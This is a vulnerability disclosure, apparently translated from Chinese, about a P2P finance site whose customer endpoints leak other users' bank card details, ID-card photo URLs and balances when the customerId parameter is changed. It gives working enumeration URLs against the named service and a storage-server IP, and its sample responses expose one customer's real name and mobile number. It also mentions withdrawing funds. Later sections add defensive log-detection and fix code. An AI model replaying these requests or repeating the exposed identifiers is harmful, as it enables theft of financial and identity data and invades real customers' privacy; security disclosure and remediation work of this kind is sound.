
P2P finance security: a vulnerability in Yizhen Finance (意真金融) leaks large amounts of user information (bank card numbers, phone numbers, ID card photos, balance lookups, etc.)


Now every kind of information is available. Would withdrawing the funds still be a problem?

This should be the user's id: 14051005

#1. Bank card number lookup

Enumerate the customerId parameter:

https://yizhenmoney.com:9003/esb/account/customer/bankInfo/list?customerId=14051005&


#2. ID card photo enumeration

Look at this: enumerating the image path pattern directly would be hard: http://140.207.169.83:8000/upload/attachment5/14051005/00150001/1432363081128.jpg

But simply by enumerating user ids we can see the image information. I used Burp Suite on my side to extract them.


https://yizhenmoney.com:9003/esb/account/customer/cardInfo/audit?customerId=14051005&

After requesting it, the response looks like this:

{
  "success" : true,
  "message" : "",
  "attr" : {
    "customerInfo" : {
      "name" : null,
      "cardId" : null,
      "foreUrl" : "",
      "foreThumbUrl" : "",
      "backUrl" : "",
      "backThumbUrl" : "",
      "handUrl" : "",
      "handThumbUrl" : "",
      "status" : ""
    },
    "cardList" : [ {
      "id" : 14098725,
      "customerId" : 14051005,
      "optSource" : null,
      "autid" : 0,
      "type" : "00150001",
      "storePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150001/1432363081128.jpg",
      "subFilePath" : null,
      "filePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150001/1432363081128.jpg",
      "status" : "00210001",
      "version" : null,
      "createDate" : null,
      "creatorId" : null,
      "modifyDate" : null,
      "modifyerId" : null,
      "remark" : null
    }, {
      "id" : 14098726,
      "customerId" : 14051005,
      "optSource" : null,
      "autid" : 0,
      "type" : "00150002",
      "storePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150002/1432363081156.jpg",
      "subFilePath" : null,
      "filePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150002/1432363081156.jpg",
      "status" : "00210001",
      "version" : null,
      "createDate" : null,
      "creatorId" : null,
      "modifyDate" : null,
      "modifyerId" : null,
      "remark" : null
    }, {
      "id" : 14098727,
      "customerId" : 14051005,
      "optSource" : null,
      "autid" : 0,
      "type" : "00150003",
      "storePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150003/1432363081184.jpg",
      "subFilePath" : null,
      "filePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150003/1432363081184.jpg",
      "status" : "00210001",
      "version" : null,
      "createDate" : null,
      "creatorId" : null,
      "modifyDate" : null,
      "modifyerId" : null,
      "remark" : null
    } ]
  }
}


http://140.207.169.83:8000/upload/attachment5/14033105/00150001/1432291395569.jpg

#3. Then the balance lookup

https://yizhenmoney.com:9003/esb/fortune/customer/accountinfo?customerId=14087605&

As you can see, the amount shows 2800:


{
  "success" : true,
  "message" : "",
  "attr" : {
    "customerAccVo" : {
      "customerId" : "14087605",
      "mobile" : "13372530130",
      "cnName" : "曹金富",
      "recomCode" : "w5dhx2",
      "status" : "0",
      "avlBal" : 0.0,
      "credAmount" : 2800.0,
      "currPay" : 0.0,
      "fortuneAmount" : 0.0,
      "currProfit" : 0.0,
      "redNum" : 0,
      "recomProfits" : 0.0,
      "withdrawStatus" : "0",
      "myRecomPerson" : null,
      "allNotRepayAmt" : 0.0
    },
    "surplusLuckNum" : 0,
    "unReadMsgCount" : 1
  }
}
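The three lookups above are one flaw on three endpoints: the server returns whatever customerId the client names, so a single session can walk through other customers' records. As an added example that is not part of the original report, here is a small Python detector that reads access-log lines (the log format and the sample lines are constructed for this example) and flags any session that successfully queried more than one distinct customerId on those endpoints.

```python
# Added example (not from the original report): flag sessions that request
# many different customerId values on the affected endpoints.
import re
from collections import defaultdict

# Constructed sample log lines in a simplified access-log format (assumption):
# <client-ip> <session-id> "<method> <path>" <status>
SAMPLE_LOG = """\
10.0.0.5 sess-aaa "GET /esb/account/customer/bankInfo/list?customerId=14051005&" 200
10.0.0.5 sess-aaa "GET /esb/account/customer/bankInfo/list?customerId=14051006&" 200
10.0.0.5 sess-aaa "GET /esb/account/customer/cardInfo/audit?customerId=14051007&" 200
10.0.0.5 sess-aaa "GET /esb/fortune/customer/accountinfo?customerId=14087605&" 200
10.0.0.9 sess-bbb "GET /esb/fortune/customer/accountinfo?customerId=14033105&" 200
10.0.0.9 sess-bbb "GET /esb/fortune/customer/accountinfo?customerId=14033105&" 200
"""

# The per-customer endpoints named in the report.
SENSITIVE_PATHS = (
    "/esb/account/customer/bankInfo/list",
    "/esb/account/customer/cardInfo/audit",
    "/esb/fortune/customer/accountinfo",
)

LINE_RE = re.compile(r'^(\S+) (\S+) "(\w+) (\S+)" (\d{3})$')


def customer_ids_per_session(log_text):
    """Map session id -> set of distinct customerId values it requested
    on the sensitive endpoints, counting successful (200) responses only."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed format
        _ip, session, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        if status != "200" or path not in SENSITIVE_PATHS:
            continue
        cid = re.search(r"(?:^|&)customerId=(\d+)", query)
        if cid:
            seen[session].add(cid.group(1))
    return seen


def flag_enumeration(log_text, max_distinct_ids=1):
    """Return the sessions that touched more distinct customerIds than allowed.
    A legitimate session only ever asks about its own customerId, so the
    default threshold is 1 (an assumption for this example)."""
    return sorted(
        session
        for session, ids in customer_ids_per_session(log_text).items()
        if len(ids) > max_distinct_ids
    )


if __name__ == "__main__":
    print(flag_enumeration(SAMPLE_LOG))  # ['sess-aaa']
```

The session id is the useful key here rather than the client IP: the report's requests are all authenticated, so the account that issued them is known, and a session whose customerId set is larger than one is the signal regardless of where it connected from.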

 

Solution:

Filter and validate the parameter.
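The fix is stated in one word; as an added illustration that is not the site's own code, here is the handler pattern the report exposes next to two hardened versions in Python. The in-memory customer table and the minimal Request object are constructed stand-ins for the platform's store and session (both assumptions).

```python
# Added example (not the site's own code): the insecure pattern the report
# describes, next to the server-side check that closes it.
from dataclasses import dataclass

# Constructed sample data standing in for the platform's customer store.
CUSTOMERS = {
    "14051005": {"cnName": "user-A", "mobile": "138****0001", "credAmount": 2800.0},
    "14033105": {"cnName": "user-B", "mobile": "139****0002", "credAmount": 0.0},
}


@dataclass
class Request:
    """The parts of an HTTP request this example needs: the customerId the
    server bound to the session at login, and the query parameters."""
    session_customer_id: str
    query: dict


class Forbidden(Exception):
    """Raised when the caller asks for a record that is not theirs."""


def accountinfo_vulnerable(req):
    """Trusts the customerId query parameter, so any logged-in user can read
    any account by changing the number. This is the behaviour shown in the report."""
    cid = req.query.get("customerId")
    return CUSTOMERS.get(cid)


def accountinfo_fixed(req):
    """Ignores the client-supplied id and uses the customerId bound to the
    authenticated session: which record is visible follows from who the
    caller is, not from what they typed."""
    return CUSTOMERS.get(req.session_customer_id)


def accountinfo_fixed_strict(req):
    """Variant for APIs that must keep the parameter: accept it only when it
    matches the session owner, otherwise refuse without revealing whether
    the other id exists."""
    requested = req.query.get("customerId")
    if requested is not None and requested != req.session_customer_id:
        raise Forbidden("customerId does not belong to the authenticated user")
    return CUSTOMERS.get(req.session_customer_id)


if __name__ == "__main__":
    # Logged in as 14051005, asking for 14033105 (a different customer).
    probe = Request("14051005", {"customerId": "14033105"})
    print(accountinfo_vulnerable(probe)["cnName"])  # user-B: leaked
    print(accountinfo_fixed(probe)["cnName"])       # user-A: own record only
```

The same check applies to the bankInfo/list and cardInfo/audit endpoints and to the image URLs they return: a file path under a customer's directory should be served only after the same ownership comparison, since the report shows the images being fetched directly from the storage host once their paths are known.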

Original link: P2P finance security: a vulnerability in Yizhen Finance (意真金融) leaks large amounts of user information (bank card numbers, phone numbers, ID card photos, balance lookups, etc.). Please credit the source when reposting.
